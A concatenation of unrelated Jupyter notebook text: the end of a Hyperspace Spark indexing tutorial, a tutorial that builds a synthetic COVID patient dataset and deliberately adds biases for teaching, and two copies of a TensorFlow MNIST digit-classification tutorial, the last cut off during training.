can be used for the query and `BucketUnion` is introduced for appended files.
###Code
# GENERATE TEST DATA
testdata = [
("orange", 3, "2020-10-01"),
("banana", 1, "2020-10-01"),
("carrot", 5, "2020-10-02"),
("beetroot", 12, "2020-10-02"),
("orange", 2, "2020-10-03"),
("banana", 11, "2020-10-03"),
("carrot", 3, "2020-10-03"),
("beetroot", 2, "2020-10-04"),
("cucumber", 7, "2020-10-05"),
("pepper", 20, "2020-10-06")
]
testdata_location = data_path + "/productTable"
from pyspark.sql.types import StructField, StructType, StringType, IntegerType
testdata_schema = StructType([
StructField('name', StringType(), True),
StructField('qty', IntegerType(), True),
StructField('date', StringType(), True)])
test_df = spark.createDataFrame(testdata, testdata_schema)
test_df.write.mode("overwrite").parquet(testdata_location)
test_df = spark.read.parquet(testdata_location)
# CREATE INDEX
hyperspace.createIndex(test_df, IndexConfig("productIndex2", ["name"], ["date", "qty"]))
spark.conf.set("spark.sql.autoBroadcastJoinThreshold", -1)
filter1 = test_df.filter("name = 'banana'")
filter2 = test_df.filter("qty > 10")
query = filter1.join(filter2, "name")
# Check Join index rule is applied properly.
hyperspace.explain(query, True, displayHTML)
# Append new files.
append_data = [
("orange", 13, "2020-11-01"),
("banana", 5, "2020-11-01")
]
append_df = spark.createDataFrame(append_data, testdata_schema)
append_df.write.mode("append").parquet(testdata_location)
###Output
_____no_output_____
###Markdown
Hybrid scan is disabled by default. Therefore, you will see that since we appended new data, Hyperspace will decide NOT to use the index.In the output, you will see no plan differences (hence no highlighting).
###Code
# Hybrid Scan configs are false by default.
spark.conf.set("spark.hyperspace.index.hybridscan.enabled", "false")
spark.conf.set("spark.hyperspace.index.hybridscan.delete.enabled", "false")
test_df_with_append = spark.read.parquet(testdata_location)
filter1 = test_df_with_append.filter("name = 'banana'")
filter2 = test_df_with_append.filter("qty > 10")
query = filter1.join(filter2, "name")
hyperspace.explain(query, True, displayHTML)
query.show()
###Output
_____no_output_____
###Markdown
Enable Hybrid Scan
In plan with indexes, you can see
`Exchange hashpartitioning` required only for appended files so that we could still utilize the "shuffled" index data with appended files. `BucketUnion` is used to merge "shuffled" appended files with the index data.
###Code
# Enable Hybrid Scan config. "delete" config is not necessary.
spark.conf.set("spark.hyperspace.index.hybridscan.enabled", "true")
# spark.conf.set("spark.hyperspace.index.hybridscan.delete.enabled", "true")
# Need to redefine query to recalculate the query plan.
query = filter1.join(filter2, "name")
hyperspace.explain(query, True, displayHTML)
query.show()
###Output
_____no_output_____
###Markdown
Incremental Index RefreshWhen you ready to update your indexes but do not want to rebuild your entire index, Hyperspace supports updating indexes in an incremental manner using `hs.refreshIndex("name", "incremental")` API. This will allow eliminate the need for a full rebuild of index from scratch, utilizing previously created index files as well as updating indexes on only the newly added data.Of course, please be sure to use the complementary `optimizeIndex` API (shown below) periodically to make sure you do not see performance regressions. We recommend calling `optimize` at least once for every 10 times you call `refreshIndex(..., "incremental")`, assuming the data you added/removed is < 10% of the original dataset. For instance, if your original dataset is 100 GB, and you've added/removed data in increments/decrements of 1 GB, you can call `refreshIndex` 10 times before calling `optimizeIndex`. Please note that this example is simply used for illustration and you have to adapt this for your workloads.In the example below, notice the addition of a `Sort` node in the query plan when indexes are used. This is because partial indexes are created on the appended data files, causing Spark to introduce a `Sort`. Please also note that `Shuffle` i.e. `Exchange` is still eliminated from the plan, giving you the appropriate acceleration.
###Code
def query():
test_df_with_append = spark.read.parquet(testdata_location)
filter1 = test_df_with_append.filter("name = 'banana'")
filter2 = test_df_with_append.filter("qty > 10")
return filter1.join(filter2, "name")
hyperspace.refreshIndex("productIndex2", "incremental")
hyperspace.explain(query(), True, displayHTML)
query().show()
###Output
_____no_output_____
###Markdown
Optimize Index layoutAfter calling incremental refreshes multiple times on newly appended data (e.g. if the user writes to data in small batches or in case of streaming scenarios), the number of index files tend to become large affecting the performance of the index (large number of small files problem). Hyperspace provides `hyperspace.optimizeIndex("indexName")` API to optimize the index layout and reduce the large files problem.In the plan below, notice that Hyperspace has removed the additional `Sort` node in the query plan. Optimize can help avoiding sorting for any index bucket which contains only one file. However, this will only be true if ALL the index buckets have at most 1 file per bucket, after `optimizeIndex`.
###Code
# Append some more data and call refresh again.
append_data = [
("orange", 13, "2020-11-01"),
("banana", 5, "2020-11-01")
]
append_df = spark.createDataFrame(append_data, testdata_schema)
append_df.write.mode("append").parquet(testdata_location)
hyperspace.refreshIndex("productIndex2", "incremental")
# Call optimize. Ensure that Sort is removed after optimization (This is possible here because after optimize, in this case, every bucket contains only 1 file.).
hyperspace.optimizeIndex("productIndex2")
hyperspace.explain(query(), True, displayHTML)
###Output
_____no_output_____
###Markdown
Optimize modesThe default mode for optimization is "quick" mode where files smaller than a predefined threshold are picked for optmization. To maximize the effect of optimization, Hyperspace allows another optimize mode "full" as shown below. This mode picks ALL index files for optimization irrespective of their file size and creates the best possible layout of the index. This is also slower than the default optimize mode because more data is being processed here.
###Code
hyperspace.optimizeIndex("productIndex2", "full")
hyperspace.explain(query(), True, displayHTML)
###Output
_____no_output_____
###Markdown
Clean UpTo make this notebook self-contained and not leave any dangling data, we have some small clean-up code below.
###Code
mssparkutils.fs.rm(data_path, True)
mssparkutils.fs.rm(index_location, True)
###Output
_____no_output_____ |
guidebooks/_build/html/_sources/rri/chapter4/project_design/synthetic_data_generation.ipynb | ###Markdown
Generating a Synthetic Healthcare DatasetThis notebook will go through the steps of creating a very simplistic (and therefore unrealistic!) model to generate a synthetic dataset, where each row represents a simulated "person", for illustrative purposes.The dataset is used in [Chapter 4](../index.md) when discussing the '[Data Analysis](data_analysis.ipynb)' stage of the project lifecycle.While several sophisticated and powerful tools (e.g. numpyro, Stan) exist for creating models in Python, here we will try to do something simple and understandable using nothing more than `pandas`, and the built-in `random` library.
###Code
import random
import datetime
import uuid
import pandas as pd
import matplotlib.pyplot as plt
%matplotlib inline
###Output
_____no_output_____
###Markdown
NHS IDThis one is easy - we'll just make up a unique string using the "uuid" library. The first 8 characters of the string will be more than enough to essentially guarantee uniqueness among tens of thousands of rows.
###Code
def get_nhs_id():
return str(uuid.uuid4())[:8]
###Output
_____no_output_____
###Markdown
Generating Age and GenderOne of the main inputs we will use for our generative model is some data on the age profiles of Covid cases and deaths in the UK, taken from this [Public Health England report](https://www.gov.uk/government/publications/covid-19-review-of-disparities-in-risks-and-outcomes)The data is in Open Document (ods) format - we need to install the `odfpy` package to read it in into pandas in the same way as we would an Excel document.
###Code
!pip install odfpy
###Output
Requirement already satisfied: odfpy in /Users/nbarlow/opt/anaconda3/lib/python3.7/site-packages (1.4.1)
Requirement already satisfied: defusedxml in /Users/nbarlow/opt/anaconda3/lib/python3.7/site-packages (from odfpy) (0.6.0)
###Markdown
The document contains a couple of useful sheets - Figure_1_1 has the age/sex pyramid of lab-confirmed COVID cases, while Figure_1_4 has the equivalent table for deaths following a positive COVID test - we may use this second one later on.
###Code
df_cases_age_sex = pd.read_excel("https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/906917/Section_1_-_Age_and_Sex.ods",
sheet_name="Figure_1_1",engine="odf",skiprows=list(range(6))+list(range(16,27)))
# remove the first two rows, dealing with <20 year olds
df_cases_age_sex.drop([0,1], inplace=True)
df_cases_age_sex
###Output
_____no_output_____
###Markdown
We can just sum the "Males" and "Females" columns to get the total number of each gender and calculate the probability of our simulated person being female, then just generate a random number and compare to that probability.
###Code
def get_sex(df):
prob_female = df["Females"].sum()/(df["Males"].sum()+df["Females"].sum())
if random.random() < prob_female:
return "F"
else:
return "M"
###Output
_____no_output_____
###Markdown
To generate an age from an age-profile distribution, we can use a trick - by calculating the cumulative fraction over the rows, we can then generate a random number between 0 and 1, and see which row that number falls in, to give us a 10-year age range. We then pick a random year from that range.
###Code
df_cases_age_sex["cumulative_sum_m"] = df_cases_age_sex["Males"].cumsum()/df_cases_age_sex["Males"].sum()
df_cases_age_sex["cumulative_sum_f"] = df_cases_age_sex["Females"].cumsum()/df_cases_age_sex["Females"].sum()
df_cases_age_sex
def get_age(df, sex):
# are we looking in the male or female column?
column_name = "cumulative_sum_f" if sex=="F" else "cumulative_sum_m"
# generate a random number between 0 and 1
x = random.random()
# Highly inefficient way of finding which row of the dataframe
# has that x value in the cumulative sum range.
for i in range(len(df)):
if i == 0 and x < df.iloc[i][column_name]:
break
elif x > df.iloc[i-1][column_name] and x < df.iloc[i][column_name]:
break
# Now we know the row number "i" - pick an age from that 10-yr range
# we have the "age_range" label as a string, e.g. "0-9" - first
# split on the dash to get lower and upper bounds
age_range = df.iloc[i]["Age group"]
# deal with a couple of special cases
if age_range == "<10":
age_range = "0-9"
elif age_range == "80+":
age_range="80-89"
age_range = age_range.split("-")
# Now use "randint" to choose an age (note that lower and upper bounds
# are inclusive here)
age = random.randint(int(age_range[0]), int(age_range[1]))
return age
###Output
_____no_output_____
###Markdown
Let's just check that these functions are doing something sensible - generate 1000 ages and plot them as a histogram:
###Code
ages = {"M": [], "F":[]}
for _ in range(1000):
sex = get_sex(df_cases_age_sex)
ages[sex].append(get_age(df_cases_age_sex, sex))
plt.hist(ages["M"],bins=10,range=(0,100), alpha=0.5, label="M")
plt.hist(ages["F"],bins=10,range=(0,100), alpha=0.5, label="F")
###Output
_____no_output_____
###Markdown
OK, that looks reasonable. We see the (surprising?) feature that women in their 60s and 70s are less likely than women in their 50s (or men in their 60s and 70s) to be diagnosed with Covid - checking back on the original DataFrame, we see that this is reflected in the numbers.Let's move on. Generating ethnicityWe will use exactly the same approach to generate the ethnicity of our simulated people, using data from the same [Public Health England report](https://www.gov.uk/government/publications/covid-19-review-of-disparities-in-risks-and-outcomes).Again, we read tables from an .ods file into pandas
###Code
df_ethnicity = pd.read_excel("https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/906922/Section_4_-_Ethnicity.ods",
sheet_name="Figure_4_1",engine="odf",skiprows=list(range(4))+[55,56])
df_ethnicity.head()
###Output
_____no_output_____
###Markdown
*Note* the column here is _incorrectly_ labelled as "deaths", however, it does in fact refer to cases.Here we have a bit more work to do. For the moment, we don't care about the date, so we just want to sum over all dates for each ethnic group.Again, we also calculate the cumulative sum, which will allow us to generate the ethnicity of a simulated patient from this distribution.
###Code
df_ethnicity_summary=df_ethnicity.groupby(["Ethnicity"])["Deaths"].sum().to_frame(name = 'sum').reset_index()
# calculate the cumulative sum again
df_ethnicity_summary["cumulative_frac"] = df_ethnicity_summary["sum"].cumsum()/df_ethnicity_summary["sum"].sum()
df_ethnicity_summary
###Output
_____no_output_____
###Markdown
We can now write a function to generate an ethnicity, using the same trick as above with the cumulative fraction:
###Code
def get_ethnicity(df):
x = random.random()
for i in range(len(df)):
if i == 0 and x < df.iloc[i]["cumulative_frac"]:
break
elif x > df.iloc[i-1]["cumulative_frac"] and x < df.iloc[i]["cumulative_frac"]:
break
return df.iloc[i]["Ethnicity"]
###Output
_____no_output_____
###Markdown
Week of AdmissionThere is a table on hospital admission rates for different regions of the country on the PHE document. We will read this table, but just sum over all regions, and yet again, calculate the cumulative fraction as we go.
###Code
df_hospital_admissions = pd.read_excel("https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/906920/Section_2_-_Geography.ods",
sheet_name="Figure_2_3",engine="odf",skiprows=list(range(6))+list(range(74,85)))
df_hospital_admissions["sum"] = df_hospital_admissions.sum(axis=1)
df_hospital_admissions["cumulative_frac"] = df_hospital_admissions["sum"].cumsum()/df_hospital_admissions["sum"].sum()
df_hospital_admissions.head()
def get_admission_date(df):
x = random.random()
for i in range(len(df)):
if i == 0 and x < df.iloc[i]["cumulative_frac"]:
break
elif x > df.iloc[i-1]["cumulative_frac"] and x < df.iloc[i]["cumulative_frac"]:
break
return df.iloc[i]["Date"].to_pydatetime()
###Output
_____no_output_____
###Markdown
Probability of admission, and of invasive ventilationWe will use yet another table from the PHE report to get the probability of being admitted to hospital, and of getting critical care (here simplified to saying "received invasive ventilation"), as a function of ethnicity. We also make a correction to the latter probability, based on date of admission - at some point, as medical staff learned more, ventilation became less likely.
###Code
df_hospital_care = pd.read_excel("https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/906922/Section_4_-_Ethnicity.ods",
sheet_name="Figure_4_3",engine="odf",skiprows=list(range(5))+list(range(12,25)))
df_hospital_care
###Output
_____no_output_____
###Markdown
Here, we want to convert the percentages into absolute numbers, so we can combine with `df_ethnicity_summary` to get the probability of being admitted (sum of both "Lower level of care" and "Critical care"), and of being put on ventilation ("Critical care")
###Code
df_hospital_care["num_lower"] = (df_hospital_care["Lower level of care (%)"]/100) * df_hospital_care.loc[5]["Lower level of care (%)"]
df_hospital_care["num_critical"] = (df_hospital_care["Critical care (%)"]/100) * df_hospital_care.loc[5]["Critical care (%)"]
df_hospital_care["num_admitted"] = (df_hospital_care["num_lower"] + df_hospital_care["num_critical"]).astype(int)
# Get rid of the "Total admitted" row of this dataframe
df_hospital_care = df_hospital_care.drop(5)
df_hospital_care
###Output
_____no_output_____
###Markdown
So let's:* Merge with the "df_ethnicity_summary" dataframe on "Ethnicity"* Add new columns for "prob admitted" and "prob ventilation"Note that there are some mismatches in the "ethnicity" names - we should rename "Any other ethnic group" in df_ethnicity_summary to "Other ethnic groups", and also fix capitalisation on "Mixed / Multiple ethnic groups"
###Code
# fix name mismatches
df_ethnicity_summary.replace(to_replace="Any other ethnic group", value="Other ethnic groups", inplace=True)
df_ethnicity_summary.replace(to_replace="Mixed / Multiple Ethnic Groups", value="Mixed / Multiple ethnic groups", inplace=True)
# harmonize column names
df_hospital_care.rename(columns={"Ethnic group":"Ethnicity"},inplace=True)
# merge dataframes
df_hospital_care = df_hospital_care.merge(df_ethnicity_summary, on="Ethnicity")
# add columns
df_hospital_care["prob_admitted"] = df_hospital_care["num_admitted"]/df_hospital_care["sum"]
df_hospital_care["prob_ventilation"] = df_hospital_care["num_critical"]/df_hospital_care["sum"]
df_hospital_care
###Output
_____no_output_____
###Markdown
Let's combine all this to get hospital admission and care data:
###Code
def get_hospital_data(df_admission, df_care, ethnicity, change_date="2020-04-15"):
"""
params
======
df_admission: pandas DataFrame containing admission dates
df_care: pandas DataFrame containing probabilities of admission and ventilation by ethnicity
ethnicity: str, the ethnicity of the simulated patient
change_date: str, ISO date format, date at which ventilation became less likely.
returns
=======
(admitted, admission_date, ventilated): tuple of (bool, datetime, bool)
"""
# did they get admitted? If not, everything else is moot
x = random.random()
prob_admitted = float(df_care[df_care.Ethnicity==ethnicity]["prob_admitted"])
if x > prob_admitted:
# they weren't admitted to hospital, so no admission date, and no ventilation
return False, None, False
change_date = datetime.datetime.fromisoformat(change_date)
admission_date = get_admission_date(df_admission)
prob_ventilation = float(df_care[df_care.Ethnicity==ethnicity]["prob_ventilation"])
# modify prob_ventilation based on change_date
if admission_date < change_date:
prob_ventilation *= 1.2
else:
prob_ventilation *= 0.5
ventilated = x < prob_ventilation
return (True, admission_date, ventilated)
###Output
_____no_output_____
###Markdown
Generating other variables For height and weight, we will assume Gaussian distributions of height and BMI (BMI is height (in m) divided by weight (in kg) squared), with sex-dependent means and standard deviations.The mean and standard deviations in height are taken from ["restore", here](https://www.restore.ac.uk/srme/www/fac/soc/wie/research-new/srme/modules/mod1/8/index.html) while those for BMI are estimates based on the values provided by [statistica, here](https://www.statista.com/statistics/375886/adult-s-body-mass-index-by-gender-and-age-in-england/).We then do some purely ad-hoc corrections to these values to account for age. We estimate that babies are about 0.5m tall on average, with average BMI of 23.For height, we assume a linear relation between average height and age from the ages 0-16, then flat afterwards, while for BMI we assume a two-sided linear relation between BMI and age, with the maximum value at age 60.These assumptions and guesses give us means and standard deviations for Gaussians, depending on age and sex. We can then use `random.gauss` to draw from these Gaussians and get a height and BMI for a simulated person, then use these to calculate weight.
###Code
def get_height_weight(age, sex):
# if sex is given as "null", assign a 50/50 chance to treating
# as "M" or "F" for the purpose of height/weight generation
if sex == "null":
sex = "F" if random.random() < 0.5 else "M"
# assume linear growth from 0.5m to avg between ages of 0 and 16
avg_height = 1.78 if sex=="M" else 1.63
std_height = 0.07 if sex=="M" else 0.06
if age < 16:
avg_height = 0.5 + (avg_height-0.5)*age/16
height = random.gauss(avg_height, std_height)
# BMI tends to peak at age 60 and is similar for men and women.
# Take _very_ simplified model where we take max_avg_bmi to be 29
# at age 60, and min_avg_bmi to be 23 at 60 years away from this,
# and linearly interpolate between
avg_bmi_max = 29
avg_bmi_min = 23
avg_bmi = abs(60-age)*(avg_bmi_max-avg_bmi_min)/60 + avg_bmi_min
std_bmi = 6.1 if sex=="F" else 4.7
bmi = random.gauss(avg_bmi, std_bmi)
# calculate weight from height and bmi
weight = bmi * height*height
return height, weight
###Output
_____no_output_____
###Markdown
Survival rateNow we come to the most critical part, and also the one where we are making the most assumptions - the chance for a simulated patient who has a positive COVID test to die.We will start from a small baseline probability, and increase this based on several factors:* Age - the chance of dying from COVID increases almost exponentially with age. Based on CDC figures [here](https://www.cdc.gov/coronavirus/2019-ncov/covid-data/investigations-discovery/hospitalization-death-by-age.html) we estimate that using 20-year-olds as the baseline, the chances of dying with COVID approximately double for every 8 years older.* BMI - having a BMI over 30 increases the chance of dying* Sex - Men have a higher chance of dying of COVID than women* Ethnicity - People of Chinese, Indian, Pakistani, Other Asian, Black Caribbean and Other Black ethnicity had between 10 and 50% higher risk of death when compared to White British - the numbers used here are based on table A1 in [the PHE document](https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/908434/Disparities_in_the_risk_and_outcomes_of_COVID_August_2020_update.pdf)* We also make some ad-hoc assumptions regarding whether the patient was hospitalised and had intrusive ventilation. In general we assume that the most seriously ill patients were admitted, and given critical care, and these were most likely to die. However, we don't enforce this relation for patients over 75, who were perhaps more likely to be in care homes.- For those that were admitted, we apply a small correction to account for the fact that the knowledge in hospitals improved over time - we say 1% relative per day after 15th April
###Code
def did_patient_die(age,
height,
weight,
sex,
ethnicity,
admitted,
admission_date,
ventilation,
change_date="2020-04-15",
baseline_prob=0.001):
"""
Returns: bool, True if patient died, False otherwise
"""
# modify for age - chance of death doubles every 8 years
prob = baseline_prob * pow(2, (age - 20)/8.)
# modify for sex
prob = prob*1.2 if sex == "M" else prob*0.8
# modify for BMI - linear relation factor 1.05 per unit of BMI over 23
BMI = height / weight*weight
if BMI > 23:
bmi_factor = 1.05 * (BMI-23)
prob = prob * bmi_factor
# modify for ethnicity
if ethnicity == "Asian / Asian British":
prob = prob * 1.35
elif ethnicity == "Black / Black British":
prob = prob * 1.2
elif ethnicity == "Mixed / Multiple ethnic groups":
prob = prob * 1.1
elif ethnicity == "Other ethnic groups":
prob = prob * 1.02
# ad-hoc corrections for whether the patient was
# hospitalised, and given ventilation
if age < 75:
if admitted:
prob *= 2
else:
prob *= 0.5
if ventilation: # double the risk again
prob *= 2
# if patient was admitted, account for the fact that care improved after some date
if admitted:
if isinstance(admission_date, str):
admission_date = datetime.datetime.fromisoformat(admission_date)
t = (admission_date - datetime.datetime.fromisoformat(change_date)).days
if t > 0:
prob = prob*(1 - t*0.01)
# now lets see whether random number 0<x<1 is below prob
x = random.random()
# return prob
return x < prob
###Output
_____no_output_____
###Markdown
Putting it all togetherWe're now ready to generate some simulated people. We first get the age, then the sex, then use these to get a height and weight, using the functions defined above. Each simulated person will be returned as a JSON object, which we can then accumulate into a pandas dataframe.
###Code
def generate_person(df_age_sex, df_ethnicity, df_admission, df_care):
"""
Generate characteristics of a simulated person, and return as JSON
parameter: df: pd.DataFrame, the age and sex profile of cases(including cumulative sum)
returns: JSON object containing all generated parameters.
"""
nhs_id = get_nhs_id()
sex = get_sex(df_age_sex)
age = get_age(df_age_sex, sex)
ethnicity = get_ethnicity(df_ethnicity)
admitted, admission_date, ventilated = get_hospital_data(df_admission, df_care, ethnicity)
height, weight = get_height_weight(age, sex)
died = did_patient_die(age, height, weight, sex, ethnicity, admitted, admission_date, ventilated)
return {
"nhs_id": nhs_id,
"site_id": "UHJ_43643",
"age": age,
"sex": sex,
"ethnicity": ethnicity,
"height": height,
"weight": weight,
"admitted": admitted,
"admission_date": admission_date,
"intrusive_ventilation": ventilated,
"died": died
}
people = []
for i in range(30000):
if i % 1000 == 0:
print("Generating", i)
people.append(
generate_person(
df_cases_age_sex,
df_ethnicity_summary,
df_hospital_admissions,
df_hospital_care)
)
###Output
Generating 0
Generating 1000
Generating 2000
Generating 3000
Generating 4000
Generating 5000
Generating 6000
Generating 7000
Generating 8000
Generating 9000
Generating 10000
Generating 11000
Generating 12000
Generating 13000
Generating 14000
Generating 15000
Generating 16000
Generating 17000
Generating 18000
Generating 19000
Generating 20000
Generating 21000
Generating 22000
Generating 23000
Generating 24000
Generating 25000
Generating 26000
Generating 27000
Generating 28000
Generating 29000
###Markdown
Now put this list of dicts into a pandas dataframe:
###Code
df_people = pd.DataFrame.from_records(people)
df_people.head(20)
###Output
_____no_output_____
###Markdown
Now export this to a CSV file:
###Code
df_people.to_csv("covid_patients_syn_data_unbiased.csv")
###Output
_____no_output_____
###Markdown
Quick check on whether the age profile of the people that died looks sensible:
###Code
df_died = df_people[df_people.died==True]
ages = {"M": [], "F":[]}
for _ in range(1000):
ages["M"] = list(df_died[df_died.sex=="M"]["age"])
ages["F"] = list(df_died[df_died.sex=="F"]["age"])
plt.hist(ages["M"],bins=10,range=(0,100), alpha=0.5, label="M")
plt.hist(ages["F"],bins=10,range=(0,100), alpha=0.5, label="F")
###Output
_____no_output_____
###Markdown
Adding biases into the datasetThere are a few possible ways that the data can be imperfect. A simple example is the binary classification of sex into "M" and "F" - some fraction of our simulated patients may be non-binary, or will have not filled in this value. Let's replace 5% of our "M" and "F" labels with "null".
###Code
def add_null_gender(df, null_prob=0.05):
for irow in range(len(df)):
if random.random() < 0.05:
df.at[irow,"sex"] = "null"
return df
df_people = add_null_gender(df_people)
df_people.head(20)
###Output
_____no_output_____
###Markdown
Another potential bias could be that older people are under-represented in the dataset because they never presented at a hospital - write a function to remove some fraction of people in some age range:
###Code
def remove_elderly_non_hospitalised(df, age_range, prob_remove=0.5):
"""
Remove some fraction (prob_remove) of people in a given age range
who weren't admitted to hospital
Parameters
==========
df: pandas DataFrame
age_range: list of 2 ints, min and max of age range to be removed
prob_remove (optional): fraction of patients within age range to remove
"""
query_string = "({} < age < {}) & (admitted==False)".format(age_range[0], age_range[1])
df_new = df.drop(df.query(query_string).sample(frac=prob_remove).index)
return df_new
df_people = remove_elderly_non_hospitalised(df_people,[75,85])
###Output
_____no_output_____
###Markdown
Data entry errors can also occur - perhaps someone gave their height in feet and inches rather than metres:
###Code
index = random.randint(0,len(df_people))
df_people.at[index,"height"] = 5.9
###Output
_____no_output_____
###Markdown
OK, let's output this to a different CSV file, which is what we will use as input for the data analysis task.
###Code
df_people.to_csv("covid_patients_syn_data.csv")
###Output
_____no_output_____ |
tf-digits.ipynb | ###Markdown
Numbers with TensorFlow 2.0
###Code
import numpy as np
import matplotlib.pyplot as plt
from six.moves.urllib.request import urlretrieve
###Output
_____no_output_____
###Markdown
Getting DataFirst step is to actually get some data! We are downloding the famous [MNIST](http://yann.lecun.com/exdb/mnist/) data set created by Yann LeCun et al. It basically has representations of digits (in numpy arrays) as well as the corresponding number. Our job is to create a function that can tell them all apart.
###Code
mnist_file = 'https://storage.googleapis.com/tensorflow/tf-keras-datasets/mnist.npz'
file, output = urlretrieve(mnist_file, 'mnist.npz')
with np.load(file) as f:
x_train, y_train = f['x_train'], f['y_train']
x_test, y_test = f['x_test'], f['y_test']
###Output
_____no_output_____
###Markdown
This helpful function takes the numpy arrays and draws them as a sanity check.
###Code
def draw_digits(X, y):
fig, axes = plt.subplots(6, 20, figsize=(18, 7),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i, ax in enumerate(axes.flat):
ax.imshow(255 - X[i], cmap='gray')
ax.set_title('{:.0f}'.format(y[i]))
draw_digits(x_train, y_train)
###Output
_____no_output_____
###Markdown
Making a Model (or function)Since we are restricting our model to only use `if` statements then lets try a decision tree model!
###Code
import tensorflow as tf
from tensorflow import keras
tf.__version__
###Output
_____no_output_____
###Markdown
We have to reshape the images because they are currently `28 x 28` pixel grayscale arrays. We want to flatten them so a row now becomes `784` pixels of numbers between `0 .. 255`. We also scale the numbers by dividing by `255`. We are scaling them to be between 0 and 1 this is one way of [Normalizing](https://docs.microsoft.com/en-us/azure/machine-learning/studio-module-reference/normalize-data) data. You will be able to visulaize this below by printing out the first item in the training set before and after it is reshaped.
###Code
#Current shape of training data set. 60000 examples that are 28 x 28
x_train.shape
#Reshape docs: https://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html
#One shape dimension can be -1. In this case, the value is inferred from the length of the array and remaining dimensions.
train_set = x_train.reshape((len(x_train), -1))
train_set.shape
y_train[0]
train_set[0].shape
train_set[0]
#We can do the reshape and normalization all in one line like this. (we split it above so you can see whats happening)
train_set = x_train.reshape((len(x_train), -1)) / 255
train_set[0]
# function shape
model = keras.Sequential([
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(10, activation='softmax')
])
###Output
WARNING: Logging before flag parsing goes to stderr.
W0826 21:36:23.911801 140308596516672 deprecation.py:506] From /home/ec2-user/anaconda3/envs/tensorflow_p36/lib/python3.6/site-packages/tensorflow/python/ops/init_ops.py:1251: calling VarianceScaling.__init__ (from tensorflow.python.ops.init_ops) with dtype is deprecated and will be removed in a future version.
Instructions for updating:
Call initializer instance with the dtype argument instead of passing it to the constructor
###Markdown
Once we have the function and the optimization method then we just fit the model!
###Code
# how to optimize the function
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(train_set, y_train, epochs=10)
###Output
Epoch 1/10
60000/60000 [==============================] - 5s 88us/sample - loss: 0.2590 - acc: 0.9262
Epoch 2/10
60000/60000 [==============================] - 5s 80us/sample - loss: 0.1139 - acc: 0.9660
Epoch 3/10
60000/60000 [==============================] - 5s 80us/sample - loss: 0.0792 - acc: 0.9759
Epoch 4/10
60000/60000 [==============================] - 5s 80us/sample - loss: 0.0594 - acc: 0.9815
Epoch 5/10
60000/60000 [==============================] - 5s 80us/sample - loss: 0.0461 - acc: 0.9857
Epoch 6/10
60000/60000 [==============================] - 5s 79us/sample - loss: 0.0364 - acc: 0.9884
Epoch 7/10
60000/60000 [==============================] - 5s 79us/sample - loss: 0.0302 - acc: 0.9905
Epoch 8/10
60000/60000 [==============================] - 5s 79us/sample - loss: 0.0233 - acc: 0.9930
Epoch 9/10
60000/60000 [==============================] - 5s 80us/sample - loss: 0.0195 - acc: 0.9941
Epoch 10/10
60000/60000 [==============================] - 5s 80us/sample - loss: 0.0159 - acc: 0.9952
###Markdown
Testing the ModelNow that we've made a model - let's see if it works!
###Code
test_set = x_test.reshape((len(x_test), -1)) / 255.
test_loss, test_acc = model.evaluate(test_set, y_test)
print('\nTest accuracy:', test_acc)
###Output
10000/10000 [==============================] - 0s 41us/sample - loss: 0.1024 - acc: 0.9778
Test accuracy: 0.9778
###Markdown
Numbers with TensorFlow 2.0
###Code
import numpy as np
import matplotlib.pyplot as plt
from six.moves.urllib.request import urlretrieve
###Output
_____no_output_____
###Markdown
Getting DataFirst step is to actually get some data! We are downloding the famous [MNIST](http://yann.lecun.com/exdb/mnist/) data set created by Yann LeCun et al. It basically has representations of digits (in numpy arrays) as well as the corresponding number. Our job is to create a function that can tell them all apart.
###Code
mnist_file = 'https://storage.googleapis.com/tensorflow/tf-keras-datasets/mnist.npz'
file, output = urlretrieve(mnist_file, 'mnist.npz')
with np.load(file) as f:
x_train, y_train = f['x_train'], f['y_train']
x_test, y_test = f['x_test'], f['y_test']
###Output
_____no_output_____
###Markdown
This helpful function takes the numpy arrays and draws them as a sanity check.
###Code
def draw_digits(X, y):
fig, axes = plt.subplots(6, 20, figsize=(18, 7),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i, ax in enumerate(axes.flat):
ax.imshow(255 - X[i], cmap='gray')
ax.set_title('{:.0f}'.format(y[i]))
draw_digits(x_train, y_train)
###Output
_____no_output_____
###Markdown
Making a Model (or function)Since we are restricting our model to only use `if` statements then lets try a decision tree model!
###Code
import tensorflow as tf
from tensorflow import keras
tf.__version__
###Output
/data/anaconda/envs/py35/lib/python3.5/site-packages/h5py/__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.
from ._conv import register_converters as _register_converters
###Markdown
We have to reshape the images because they are currently `28 x 28` pixel grayscale arrays. We want to flatten them so a row now becomes `784` pixels of numbers between `0 .. 255`. We also scale the numbers by dividing by `255`. We are scaling them to be between 0 and 1 this is one way of [Normalizing](https://docs.microsoft.com/en-us/azure/machine-learning/studio-module-reference/normalize-data) data. You will be able to visulaize this below by printing out the first item in the training set before and after it is reshaped.
###Code
#Current shape of training data set. 60000 examples that are 28 x 28
x_train.shape
#Reshape docs: https://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html
#One shape dimension can be -1. In this case, the value is inferred from the length of the array and remaining dimensions.
train_set = x_train.reshape((len(x_train), -1))
train_set.shape
y_train[0]
train_set[0].shape
train_set[0]
#We can do the reshape and normalization all in one line like this. (we split it above so you can see whats happening)
train_set = x_train.reshape((len(x_train), -1)) / 255
train_set[0]
# function shape
model = keras.Sequential([
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(10, activation='softmax')
])
###Output
_____no_output_____
###Markdown
Once we have the function and the optimization method then we just fit the model!
###Code
# how to optimize the function
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(train_set, y_train, epochs=10)
###Output
Epoch 1/10
